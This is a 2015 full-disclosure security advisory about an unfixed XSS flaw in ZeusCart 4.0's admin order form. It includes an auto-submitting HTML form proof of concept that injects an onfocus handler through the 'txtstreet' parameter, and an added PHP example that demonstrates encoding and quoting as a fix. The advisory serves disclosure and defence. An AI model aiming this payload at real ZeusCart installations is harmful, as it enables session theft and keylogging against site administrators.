ZeusCart 4.0: XSS

Date: 2015-09-14 10:58:45
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "txtstreet" POST parameter when adding a new order. With this, it is possible to steal cookies or inject JavaScript keyloggers.

3. Proof of Concept

<form name="myform" method="post" action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create" >
    <input type="hidden" name="hidOrderTotal" value="400">
    <input type="hidden" name="discount" value="flat">
    <input type="hidden" name="selCustomer" value="1">
    <input type="hidden" name="payOption" value="8">
    <input type="hidden" name="txtname" value="Primary">
    <input type="hidden" name="txtstreet" value="foo autofocus onfocus=alert(1); bar">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.
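
For sites that have to patch locally, the following is an added example and not ZeusCart code or part of the original advisory. It assumes the "txtstreet" value is echoed back into an HTML attribute (the advisory does not show the sink), and its function names are hypothetical. The payload from the proof of concept contains no character that htmlspecialchars() rewrites, so the attribute must be quoted as well as encoded.

```php
<?php
// Added example, not ZeusCart code; function names are hypothetical.
// Constructed input: the txtstreet value from the proof of concept.
$street = 'foo autofocus onfocus=alert(1); bar';

// Encode for an HTML attribute context (covers both quote styles).
function encode_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Parse a rendered <input> tag and return the attribute names the parser sees.
function input_attribute_names(string $html): array
{
    libxml_use_internal_errors(true);          // tolerate fragment-level HTML
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $input = $doc->getElementsByTagName('input')->item(0);
    $names = [];
    foreach ($input->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

$renderings = [
    // Assumed vulnerable pattern: raw value in an unquoted attribute.
    'raw, unquoted'     => '<input name=txtstreet value=' . $street . '>',
    // Encoding alone: the payload has no <, >, &, " or ', so it is unchanged
    // and the spaces still split it into separate attributes.
    'encoded, unquoted' => '<input name=txtstreet value=' . encode_attr($street) . '>',
    // Hardened: quotes keep the whole value inside the attribute, and the
    // encoding stops a value containing a quote from closing it early.
    'encoded, quoted'   => '<input name="txtstreet" value="' . encode_attr($street) . '">',
];

foreach ($renderings as $label => $html) {
    $injected = in_array('onfocus', input_attribute_names($html), true);
    printf("%-18s onfocus attribute present: %s\n", $label, $injected ? 'yes' : 'no');
}
```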

5. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public